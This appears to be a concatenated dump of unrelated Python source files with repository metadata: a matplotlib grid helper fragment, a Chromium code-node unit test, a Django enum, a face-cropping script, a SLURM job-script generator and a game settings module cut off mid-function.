        self.grid_info = None
        self._old_values = None
        self._aux_trans = aux_trans
        # GridFinder does the actual work of locating grid lines and ticks.
        self.grid_finder = GridFinder(aux_trans,
                                      extreme_finder,
                                      grid_locator1,
                                      grid_locator2,
                                      tick_formatter1,
                                      tick_formatter2)
    def update_grid_finder(self, aux_trans=None, **kw):
        # Update transform and/or locator/formatter settings, then force a
        # regrid on the next draw.
        if aux_trans is not None:
            self.grid_finder.update_transform(aux_trans)
        self.grid_finder.update(**kw)
        self.invalidate()
    def _update(self, x1, x2, y1, y2):
        "bbox in 0-based image coordinates"
        # update wcsgrid
        # Skip recomputation if the view limits are unchanged.
        if self.valid() and self._old_values == (x1, x2, y1, y2):
            return
        self._update_grid(x1, y1, x2, y2)
        self._old_values = (x1, x2, y1, y2)
        self._force_update = False
    def new_fixed_axis(self, loc,
                       nth_coord=None,
                       axis_direction=None,
                       offset=None,
                       axes=None):
        # Create an AxisArtist pinned to side *loc* ("left", "bottom", ...).
        if axes is None:
            axes = self.axes
        if axis_direction is None:
            axis_direction = loc
        _helper = FixedAxisArtistHelper(self, loc, nth_coord_ticks=nth_coord)
        axisline = AxisArtist(axes, _helper, axis_direction=axis_direction)
        # Why is clip not set on axisline, unlike in new_floating_axis or in
        # the floating_axig.GridHelperCurveLinear subclass?
        return axisline
    def new_floating_axis(self, nth_coord,
                          value,
                          axes=None,
                          axis_direction="bottom"
                          ):
        # Create an AxisArtist along the curve where coordinate *nth_coord*
        # equals *value*.
        if axes is None:
            axes = self.axes
        _helper = FloatingAxisArtistHelper(
            self, nth_coord, value, axis_direction)
        axisline = AxisArtist(axes, _helper)
        # _helper = FloatingAxisArtistHelper(self, nth_coord,
        #                                    value,
        #                                    label_direction=label_direction,
        #                                    )
        # axisline = AxisArtistFloating(axes, _helper,
        #                               axis_direction=axis_direction)
        axisline.line.set_clip_on(True)
        axisline.line.set_clip_box(axisline.axes.bbox)
        # axisline.major_ticklabels.set_visible(True)
        # axisline.minor_ticklabels.set_visible(False)
        # axisline.major_ticklabels.set_rotate_along_line(True)
        # axisline.set_rotate_label_along_line(True)
        return axisline
    def _update_grid(self, x1, y1, x2, y2):
        # Cache the full grid description for the given data rectangle.
        self.grid_info = self.grid_finder.get_grid_info(x1, y1, x2, y2)
    def get_gridlines(self, which="major", axis="both"):
        # NOTE(review): *which* is accepted but ignored; both "lon" and
        # "lat" line sets come from grid_info regardless — confirm intent.
        grid_lines = []
        if axis in ["both", "x"]:
            for gl in self.grid_info["lon"]["lines"]:
                grid_lines.extend(gl)
        if axis in ["both", "y"]:
            for gl in self.grid_info["lat"]["lines"]:
                grid_lines.extend(gl)
        return grid_lines
    def get_tick_iterator(self, nth_coord, axis_side, minor=False):
        """Yield (xy, angle_normal, angle_tangent, label) for each tick on
        *axis_side*; minor ticks reuse the major positions with no label."""
        # axisnr = dict(left=0, bottom=1, right=2, top=3)[axis_side]
        angle_tangent = dict(left=90, right=90, bottom=0, top=0)[axis_side]
        # angle = [0, 90, 180, 270][axisnr]
        lon_or_lat = ["lon", "lat"][nth_coord]
        if not minor:  # major ticks
            for (xy, a), l in zip(
                    self.grid_info[lon_or_lat]["tick_locs"][axis_side],
                    self.grid_info[lon_or_lat]["tick_labels"][axis_side]):
                angle_normal = a
                yield xy, angle_normal, angle_tangent, l
        else:
            for (xy, a), l in zip(
                    self.grid_info[lon_or_lat]["tick_locs"][axis_side],
                    self.grid_info[lon_or_lat]["tick_labels"][axis_side]):
                angle_normal = a
                yield xy, angle_normal, angle_tangent, ""
        # for xy, a, l in self.grid_info[lon_or_lat]["ticks"][axis_side]:
        #     yield xy, a, ""
| [
"kitae.yoon@deliveryhero.co.kr"
] | kitae.yoon@deliveryhero.co.kr |
2d5720190dc89d57eaf284a81c58774922bfc172 | 896b5a6aab6cb6c1e3ee2e59aad0128226471871 | /third_party/blink/renderer/bindings/scripts/bind_gen/code_node_test.py | 2b8c7c82ad64f97f787868ffd7237cee89a8def7 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | bkueppers/chromium | 86f09d32b7cb418f431b3b01a00ffe018e24de32 | d160b8b58d58120a9b2331671d0bda228d469482 | refs/heads/master | 2023-03-14T10:41:52.563439 | 2019-11-08T13:33:40 | 2019-11-08T13:33:40 | 219,389,734 | 0 | 0 | BSD-3-Clause | 2019-11-04T01:05:37 | 2019-11-04T01:05:37 | null | UTF-8 | Python | false | false | 9,142 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from .code_node import FunctionDefinitionNode
from .code_node import LikelyExitNode
from .code_node import LiteralNode
from .code_node import SequenceNode
from .code_node import SymbolNode
from .code_node import SymbolScopeNode
from .code_node import TextNode
from .code_node import UnlikelyExitNode
from .mako_renderer import MakoRenderer
class CodeNodeTest(unittest.TestCase):
    """Unit tests for the code_node tree: literal/text nodes, sequences,
    symbol-definition insertion, exit branches and function definitions."""
    def render(self, node):
        # Render repeatedly until the output stabilizes; symbol definition
        # insertion can change the tree between passes.
        prev = ""
        current = str(node)
        while current != prev:
            prev = current
            current = str(node)
        return current
    def assertRenderResult(self, node, expected):
        # Compare whitespace-normalized renderings (indentation and runs of
        # spaces are irrelevant to these tests).
        def simplify(text):
            return "\n".join(
                [" ".join(line.split()) for line in text.split("\n")])
        actual = simplify(self.render(node))
        expected = simplify(expected)
        self.assertEqual(actual, expected)
    def test_literal_node(self):
        """
        Tests that, in LiteralNode, the special characters of template (%, ${},
        etc) are not processed.
        """
        renderer = MakoRenderer()
        root = LiteralNode("<% x = 42 %>${x}", renderer=renderer)
        self.assertRenderResult(root, "<% x = 42 %>${x}")
    def test_empty_literal_node(self):
        """An empty LiteralNode renders to an empty string."""
        renderer = MakoRenderer()
        root = LiteralNode("", renderer=renderer)
        self.assertRenderResult(root, "")
    def test_text_node(self):
        """Tests that the template language works in TextNode."""
        renderer = MakoRenderer()
        root = TextNode("<% x = 42 %>${x}", renderer=renderer)
        self.assertRenderResult(root, "42")
    def test_empty_text_node(self):
        """An empty TextNode renders to an empty string."""
        renderer = MakoRenderer()
        root = TextNode("", renderer=renderer)
        self.assertRenderResult(root, "")
    def test_list_operations_of_sequence_node(self):
        """
        Tests that list operations (insert, append, and extend) of SequenceNode
        work just same as Python built-in list.
        """
        renderer = MakoRenderer()
        root = SequenceNode(separator=",", renderer=renderer)
        root.extend([
            LiteralNode("2"),
            LiteralNode("4"),
        ])
        root.insert(1, LiteralNode("3"))
        root.insert(0, LiteralNode("1"))
        # Out-of-range insert appends, like Python's list.insert.
        root.insert(100, LiteralNode("5"))
        root.append(LiteralNode("6"))
        self.assertRenderResult(root, "1,2,3,4,5,6")
        root.remove(root[0])
        root.remove(root[2])
        root.remove(root[-1])
        self.assertRenderResult(root, "2,3,5")
    def test_nested_sequence(self):
        """Tests nested SequenceNodes."""
        renderer = MakoRenderer()
        root = SequenceNode(separator=",", renderer=renderer)
        nested = SequenceNode(separator=",")
        nested.extend([
            LiteralNode("2"),
            LiteralNode("3"),
            LiteralNode("4"),
        ])
        root.extend([
            LiteralNode("1"),
            nested,
            LiteralNode("5"),
        ])
        self.assertRenderResult(root, "1,2,3,4,5")
    def test_symbol_definition_chains(self):
        """
        Tests that use of SymbolNode inserts necessary SymbolDefinitionNode
        appropriately.
        """
        renderer = MakoRenderer()
        root = SymbolScopeNode(separator_last="\n", renderer=renderer)
        root.register_code_symbols([
            SymbolNode("var1", "int ${var1} = ${var2} + ${var3};"),
            SymbolNode("var2", "int ${var2} = ${var5};"),
            SymbolNode("var3", "int ${var3} = ${var4};"),
            SymbolNode("var4", "int ${var4} = 1;"),
            SymbolNode("var5", "int ${var5} = 2;"),
        ])
        root.append(TextNode("(void)${var1};"))
        # Definitions must appear in dependency order before first use.
        self.assertRenderResult(
            root, """\
int var5 = 2;
int var2 = var5;
int var4 = 1;
int var3 = var4;
int var1 = var2 + var3;
(void)var1;
""")
    def test_symbol_definition_with_exit_branches(self):
        """Symbols used inside exit branches are defined at the right scope:
        before the branch if used outside too, inside it otherwise."""
        renderer = MakoRenderer()
        root = SymbolScopeNode(separator_last="\n", renderer=renderer)
        root.register_code_symbols([
            SymbolNode("var1", "int ${var1} = 1;"),
            SymbolNode("var2", "int ${var2} = 2;"),
            SymbolNode("var3", "int ${var3} = 3;"),
            SymbolNode("var4", "int ${var4} = 4;"),
            SymbolNode("var5", "int ${var5} = 5;"),
            SymbolNode("var6", "int ${var6} = 6;"),
        ])
        root.extend([
            TextNode("${var1};"),
            UnlikelyExitNode(
                cond=TextNode("${var2}"),
                body=SymbolScopeNode([
                    TextNode("${var3};"),
                    TextNode("return ${var4};"),
                ])),
            LikelyExitNode(
                cond=TextNode("${var5}"),
                body=SymbolScopeNode([
                    TextNode("return ${var6};"),
                ])),
            TextNode("${var3};"),
        ])
        self.assertRenderResult(
            root, """\
int var1 = 1;
var1;
int var2 = 2;
int var3 = 3;
if (var2) {
var3;
int var4 = 4;
return var4;
}
int var5 = 5;
if (var5) {
int var6 = 6;
return var6;
}
var3;
""")
    def test_symbol_definition_with_nested_exit_branches(self):
        """Symbols only used in the innermost branch get defined there."""
        renderer = MakoRenderer()
        root = SymbolScopeNode(separator_last="\n", renderer=renderer)
        root.register_code_symbols([
            SymbolNode("var1", "int ${var1} = 1;"),
            SymbolNode("var2", "int ${var2} = 2;"),
            SymbolNode("var3", "int ${var3} = 3;"),
            SymbolNode("var4", "int ${var4} = 4;"),
            SymbolNode("var5", "int ${var5} = 5;"),
            SymbolNode("var6", "int ${var6} = 6;"),
        ])
        root.extend([
            UnlikelyExitNode(
                cond=LiteralNode("false"),
                body=SymbolScopeNode([
                    UnlikelyExitNode(
                        cond=LiteralNode("false"),
                        body=SymbolScopeNode([
                            TextNode("return ${var1};"),
                        ])),
                    LiteralNode("return;"),
                ])),
            LikelyExitNode(
                cond=LiteralNode("true"),
                body=SymbolScopeNode([
                    LikelyExitNode(
                        cond=LiteralNode("true"),
                        body=SymbolScopeNode([
                            TextNode("return ${var2};"),
                        ])),
                    LiteralNode("return;"),
                ])),
        ])
        self.assertRenderResult(
            root, """\
if (false) {
if (false) {
int var1 = 1;
return var1;
}
return;
}
if (true) {
if (true) {
int var2 = 2;
return var2;
}
return;
}
""")
    def test_function_definition_minimum(self):
        """A FunctionDefinitionNode with no args/body renders a stub."""
        renderer = MakoRenderer()
        root = SymbolScopeNode(separator_last="\n", renderer=renderer)
        root.append(
            FunctionDefinitionNode(
                name=LiteralNode("blink::bindings::func"),
                arg_decls=[],
                return_type=LiteralNode("void")))
        self.assertRenderResult(root, """\
void blink::bindings::func() {
}
""")
    def test_function_definition_full(self):
        """FunctionDefinitionNode with args, local vars, body and comment."""
        renderer = MakoRenderer()
        root = SymbolScopeNode(separator_last="\n", renderer=renderer)
        local_vars = [
            SymbolNode("var1", "int ${var1} = 1;"),
            SymbolNode("var2", "int ${var2} = 2;"),
        ]
        func_body = SymbolScopeNode([
            UnlikelyExitNode(
                cond=TextNode("${var1}"),
                body=SymbolScopeNode([TextNode("return ${var1};")])),
            TextNode("return ${var2};"),
        ])
        root.append(
            FunctionDefinitionNode(
                name=LiteralNode("blink::bindings::func"),
                arg_decls=[LiteralNode("int arg1"),
                           LiteralNode("int arg2")],
                return_type=LiteralNode("void"),
                local_vars=local_vars,
                body=func_body,
                comment=LiteralNode("// comment1\n// comment2")))
        self.assertRenderResult(
            root, """\
// comment1
// comment2
void blink::bindings::func(int arg1, int arg2) {
int var1 = 1;
if (var1) {
return var1;
}
int var2 = 2;
return var2;
}
""")
    def test_template_error_handling(self):
        """On a template error the renderer records the caller chain from
        the failing node up to the root."""
        renderer = MakoRenderer()
        root = SymbolScopeNode(renderer=renderer)
        root.append(
            SymbolScopeNode([
                # Have Mako raise a NameError.
                TextNode("${unbound_symbol}"),
            ]))
        with self.assertRaises(NameError):
            root.render()
        callers_on_error = list(renderer.callers_on_error)
        self.assertEqual(len(callers_on_error), 3)
        self.assertEqual(callers_on_error[0], root[0][0])
        self.assertEqual(callers_on_error[1], root[0])
        self.assertEqual(callers_on_error[2], root)
        self.assertEqual(renderer.last_caller_on_error, root[0][0])
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
db4906b126e1ee3ff257b3bb20c776ab64d9a31b | 90ec9a009d84dd7eebbd93de4f4b9de553326a39 | /app/config/enums.py | a558f22c18fe955f066b40058f21e00a46fa4fc0 | [] | no_license | alexiuasse/NipponArDjango | 18a86bb108b9d72b36c8adf7c4344398cc4ca6b2 | ddc541a8d7e4428bde63c56f44354d6f82e0f40d | refs/heads/master | 2023-08-03T12:16:56.431870 | 2021-07-15T23:43:33 | 2021-07-15T23:43:33 | 278,093,323 | 0 | 0 | null | 2021-09-22T20:04:15 | 2020-07-08T13:13:22 | CSS | UTF-8 | Python | false | false | 391 | py | # Created by Alex Matos Iuasse.
# Copyright (c) 2020. All rights reserved.
# Last modified 10/08/2020 10:14.
from enum import Enum
class ContextualEnum(Enum):
    """Bootstrap contextual CSS classes keyed by Portuguese color names."""
    VERDE = "success"
    AZUL = "primary"
    CIANO = "info"
    AMARELO = "warning"
    VERMELHO = "danger"
    CINZA = "default"
    @classmethod
    def choices(cls):
        """Return Django-style ``(value, name)`` choice tuples, in
        declaration order."""
        return [(member.value, member.name) for member in cls]
| [
"alexiuasse@gmail.com"
] | alexiuasse@gmail.com |
8c91a1c95584126d62eb15a000e7d8c552c05140 | 60aee65d7d40f2886a4c15e08e50f145c809aff6 | /experiment/Keras Machine Learning Model/function/imgCrop.py | 419986e7616c7aa5477d0e5bd51844dd9b815006 | [] | no_license | tshahria/DreamCatcher | 2fdabd90add46eb86a20fe1aa1b5bb4d4a58ddb1 | 3880b120f8ed857462d565fbf48d320076bff73a | refs/heads/master | 2021-05-06T10:19:18.634656 | 2017-12-08T20:31:44 | 2017-12-08T20:31:44 | 114,164,133 | 0 | 1 | null | 2017-12-13T20:09:44 | 2017-12-13T20:09:43 | null | UTF-8 | Python | false | false | 2,849 | py | import sys
from PIL import Image, ImageDraw
try:
import cv2 as cv
except ImportError:
print('Could not import cv, trying opencv')
import opencv.cv as cv
def main():
    """Crop a source photo into a target_width x target_height banner that
    keeps all detected faces vertically centred.

    Returns a process exit code: 0 on success, 1 when the detected faces
    are too tall to fit the target crop.
    """
    source_image = Image.open('function/ppl.jpg')
    source_width, source_height = source_image.size
    print('Image is {}x{}'.format(source_width, source_height))
    target_width = 1000
    target_height = 200
    # Make image a reasonable size to work with. Using the source_height will
    # make sure it's just resized to the target_width
    source_image.thumbnail((target_width, source_height), Image.ANTIALIAS)
    # Find the faces and show us where they are
    faces = faces_from_pil_image(source_image)
    faces_found_image = draw_faces(source_image, faces)
    faces_found_image.show()
    # Get details about where the faces are so we can crop
    top_of_faces = top_face_top(faces)
    bottom_of_faces = bottom_face_bottom(faces)
    all_faces_height = bottom_of_faces - top_of_faces
    print('Faces are {} pixels high'.format(all_faces_height))
    # BUG FIX: compare the face span against the crop *height*. The old
    # code compared against target_width (1000), so faces taller than the
    # 200px crop were never caught and face_buffer below went negative,
    # producing a crop that cuts faces off.
    if all_faces_height >= target_height:
        print('Faces take up more than the final image, you need better logic')
        exit_code = 1
    else:
        # Figure out where to crop and show the results
        face_buffer = 0.5 * (target_height - all_faces_height)
        top_of_crop = int(top_of_faces - face_buffer)
        coords = (0, top_of_crop, target_width, top_of_crop + target_height)
        print('Cropping to', coords)
        final_image = source_image.crop(coords)
        final_image.show()
        exit_code = 0
    return exit_code
def faces_from_pil_image(pil_image):
    "Return a list of (x,y,h,w) tuples for faces detected in the PIL image"
    # NOTE(review): this uses the legacy OpenCV 1.x `cv` API
    # (CreateMemStorage / HaarDetectObjects), which was removed in
    # OpenCV 3+; the `import cv2 as cv` fallback at the top of the file
    # will not provide these names — confirm the runtime OpenCV version.
    storage = cv.CreateMemStorage(0)
    # Haar cascade file is looked up relative to the working directory.
    facial_features = cv.Load('haarcascade_frontalface_alt.xml', storage=storage)
    cv_im = cv.CreateImageHeader(pil_image.size, cv.IPL_DEPTH_8U, 3)
    # NOTE(review): PIL's Image.tostring() was renamed tobytes() in
    # Pillow; this call assumes an old PIL — verify.
    cv.SetData(cv_im, pil_image.tostring())
    faces = cv.HaarDetectObjects(cv_im, facial_features, storage)
    # faces includes a `neighbors` field that we aren't going to use here
    return [f[0] for f in faces]
def top_face_top(faces):
    """Return the y coordinate of the topmost face edge.

    The image origin is the top-left corner, so the highest face is the
    one with the smallest y value.
    """
    return min(y for _x, y, _w, _h in faces)
def bottom_face_bottom(faces):
    """Return the y coordinate of the lowest face edge.

    Each face's bottom is its top plus its height; with the origin at the
    top-left corner, the lowest edge is the maximum of those values.
    """
    return max(y + h for _x, y, _w, h in faces)
def draw_faces(image_, faces):
    """Return a copy of *image_* with a rectangle outlining each face."""
    annotated = image_.copy()
    pen = ImageDraw.Draw(annotated)
    for x, y, w, h in faces:
        # (left, top, right, bottom) in absolute image coordinates.
        pen.rectangle((x, y, x + w, y + h))
    return annotated
if __name__ == '__main__':
sys.exit(main()) | [
"jeffreykam0415@gmail.com"
] | jeffreykam0415@gmail.com |
dfb78191a7e2e45e05ba8a63e31ddffa103108f6 | 504efba4ab5ba1721ab3388144b16fa5f24833e7 | /07_Chroma_Scan_SC_NoRF/01_05/Make_SLURM_submission_script.py | 884a2e4ed4160053f6c9bacba40ba1044ad8a6a7 | [
"MIT"
] | permissive | HaroonRafique/PS_Transfer | b568fe41c98357877c3bc63b2ca89f8724439da0 | 59ed8a0978ba4699f34c9f7a2500e0026759a2b6 | refs/heads/master | 2023-05-25T21:13:36.586605 | 2020-07-10T07:41:40 | 2020-07-10T07:41:40 | 213,405,455 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,317 | py | #!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '05_01_05'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
| [
"haroon.rafique@protonmail.com"
] | haroon.rafique@protonmail.com |
e4da44a87446e6be726c46a697a1b2f50bba2bff | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve-8.51.857815/carbonui/util/settings.py | 9ec58d3fedc0bf851a67f8bbbabc77cf1a491343 | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,146 | py | #Embedded file name: carbonui/util\settings.py
"""
Does persisted settings with last-accessed cache feature and such.
"""
import blue
import os
from carbonui.util.bunch import Bunch
import defaultsetting
import types
import yaml
import traceback
import uthread
from carbon.common.script.util.timerstuff import AutoTimer
from carbonui.util.various_unsorted import GetAttrs
import log
class SettingSection:
"""
Binary settings file handling
"""
def __init__(self, name, filepath, autoStoreInterval, service):
self._name = name
self._filepath = filepath
self._dirty = False
self._service = service
self.datastore = {}
self.LoadFromFile(filepath, autoStoreInterval)
def __str__(self):
return '%s\nSetting section, %s; holding %s groups.\nFileLocation: %s' % ('-' * 60,
self._name,
len(self.datastore),
repr(self._filepath))
def __repr__(self):
s = self.__str__() + '\n'
for groupName, groupValue in self.datastore.iteritems():
s += '%s:\n' % groupName
for settingName, settingValue in groupValue.iteritems():
s += ' %s: %s\n' % (settingName, settingValue)
return s
class Group(dict):
"""
Wrapper class to make groups more accessible within setting sections
"""
def __init__(self, name, section):
self.__dict__['name'] = name
self.__dict__['section'] = section
def __getattr__(self, attrName):
if hasattr(self, 'section'):
return self.section.Get(self.name, attrName)
def Get(self, attrName, defValue = None):
retVal = self.__getattr__(attrName)
if retVal is None:
return defValue
return retVal
def __setattr__(self, attrName, value):
if hasattr(self, 'section'):
self.section.Set(self.name, attrName, value)
Set = __setattr__
def Release(self):
self.section = None
def HasKey(self, attrName):
return self.section.HasKey(self.name, attrName)
def Delete(self, attrName):
self.section.Delete(self.name, attrName)
def GetValues(self):
return self.section.GetValues(self.name)
def LoadFromFile(self, filepath, autoStoreInterval):
data = None
try:
fn = blue.paths.ResolvePath(filepath)
data = blue.win32.AtomicFileRead(fn)
except:
pass
if data and data[0]:
try:
self.datastore = blue.marshal.Load(data[0])
for k, v in self.datastore.iteritems():
self.CreateGroup(k)
except:
log.LogError('Error loading settings data file--', str(self))
self.timeoutTimer = AutoTimer(autoStoreInterval * 1000, self.WriteToDisk)
def GetValues(self, groupName):
return self.datastore[groupName]
def Get(self, groupName, settingName):
"""
We keep track of last access for each entry - see FlushOldEntries below.
"""
if groupName not in self.datastore:
self.CreateGroup(groupName)
if settingName in self.datastore[groupName]:
value = self.datastore[groupName][settingName][1]
self.datastore[groupName][settingName] = (blue.os.GetWallclockTime(), value)
return value
else:
n = settingName
if type(n) == types.UnicodeType:
n = n.encode('UTF-8')
return GetAttrs(defaultsetting, self._name, groupName, n)
def HasKey(self, groupName, settingName):
return settingName in self.datastore[groupName]
def Delete(self, groupName, settingName):
if self.HasKey(groupName, settingName):
del self.datastore[groupName][settingName]
def Set(self, groupName, settingName, value):
if groupName not in self.datastore:
self.CreateGroup(groupName)
self.datastore[groupName][settingName] = (blue.os.GetWallclockTime(), value)
self.FlagDirty()
def Remove(self, groupName, settingName = None):
if groupName in self.datastore:
group = self.datastore[groupName]
if settingName:
if settingName in group:
del group[settingName]
else:
del self.datastore[groupName]
self.FlagDirty()
def CreateGroup(self, groupName):
if groupName not in self.__dict__:
self.__dict__[groupName] = self.Group(groupName, self)
if groupName not in self.datastore:
self.datastore[groupName] = {}
def FlagDirty(self):
self._dirty = True
def WriteToDisk(self):
if self._dirty:
self._dirty = False
fn = blue.paths.ResolvePathForWriting(self._filepath)
try:
if os.access(fn, os.F_OK) and not os.access(fn, os.W_OK):
os.chmod(fn, 438)
k = blue.marshal.Save(self.datastore)
blue.win32.AtomicFileWrite(fn, k)
except Exception as e:
log.LogError('Failed writing to disk', str(self), '-', repr(e))
def Unload(self):
self.timeoutTimer = None
self.FlushOldEntries()
self.WriteToDisk()
def Save(self):
self.FlushOldEntries()
self.WriteToDisk()
def FlushOldEntries(self):
    """
    Removes all entries older than lastModified.
    Default value is 6 weeks ago.

    Fixes: snapshot the keys before deleting (``for key in v.keys()``
    with an in-loop ``del`` only worked because py2 keys() copies; on
    py3 it is a live view and raises RuntimeError), and flag the
    section dirty once per sweep instead of once per deleted entry.
    """
    lastModified = blue.os.GetWallclockTime() - const.WEEK * 6
    removed = False
    for k, v in self.datastore.iteritems():
        # list() makes deletion safe on both py2 and py3.
        for key in list(v.keys()):
            if v[key][0] <= lastModified:
                del v[key]
                removed = True
    if removed:
        self.FlagDirty()
def SetDatastore(self, datastore):
    """Replace the section's backing dict wholesale (used when loading)."""
    self.datastore = datastore
def GetDatastore(self):
    """Return the raw backing dict of the section."""
    return self.datastore
class YAMLSettingSection(SettingSection):
    """SettingSection variant that persists its datastore as YAML."""

    def __init__(self, name, filepath, autoStoreInterval, service):
        SettingSection.__init__(self, name, filepath, autoStoreInterval, service)

    def LoadFromFile(self, filepath, autoStoreInterval):
        """Load the YAML settings file (best-effort) and start the autosave timer."""
        data = None
        try:
            fn = blue.paths.ResolvePath(filepath)
            data = blue.win32.AtomicFileRead(fn)
        except:
            # Missing or unreadable file: start with an empty datastore.
            pass
        if data and data[0]:
            try:
                # Force every YAML scalar string to load as unicode (py2).
                yaml.CSafeLoader.add_constructor(u'tag:yaml.org,2002:str', StringToUnicodeConstructor)
                self.datastore = yaml.load(data[0], Loader=yaml.CSafeLoader)
                # Re-create the attribute-access Group proxies for each
                # top-level key that was loaded.
                for k, v in self.datastore.iteritems():
                    self.CreateGroup(k)
            except:
                log.LogError('Error loading settings data file -- ', traceback.format_exc())
        self.timeoutTimer = AutoTimer(autoStoreInterval * 1000, self.WriteToDisk)

    def WriteToDisk(self):
        # Persist on a worker tasklet rather than blocking the caller.
        uthread.new(self._WriterThreadFunc)

    def _WriterThreadFunc(self):
        """Serialise the datastore to YAML and write it atomically when dirty."""
        if self._dirty:
            self._dirty = False
            fn = blue.paths.ResolvePathForWriting(self._filepath)
            try:
                # 438 == 0o666: make a read-only settings file writable again.
                if os.access(fn, os.F_OK) and not os.access(fn, os.W_OK):
                    os.chmod(fn, 438)
                k = yaml.dump(self.datastore, Dumper=yaml.CSafeDumper)
                blue.win32.AtomicFileWrite(fn, k)
            except Exception as e:
                log.LogError('Failed writing to disk', str(self), '-', repr(e))
def LoadBaseSettings():
    """
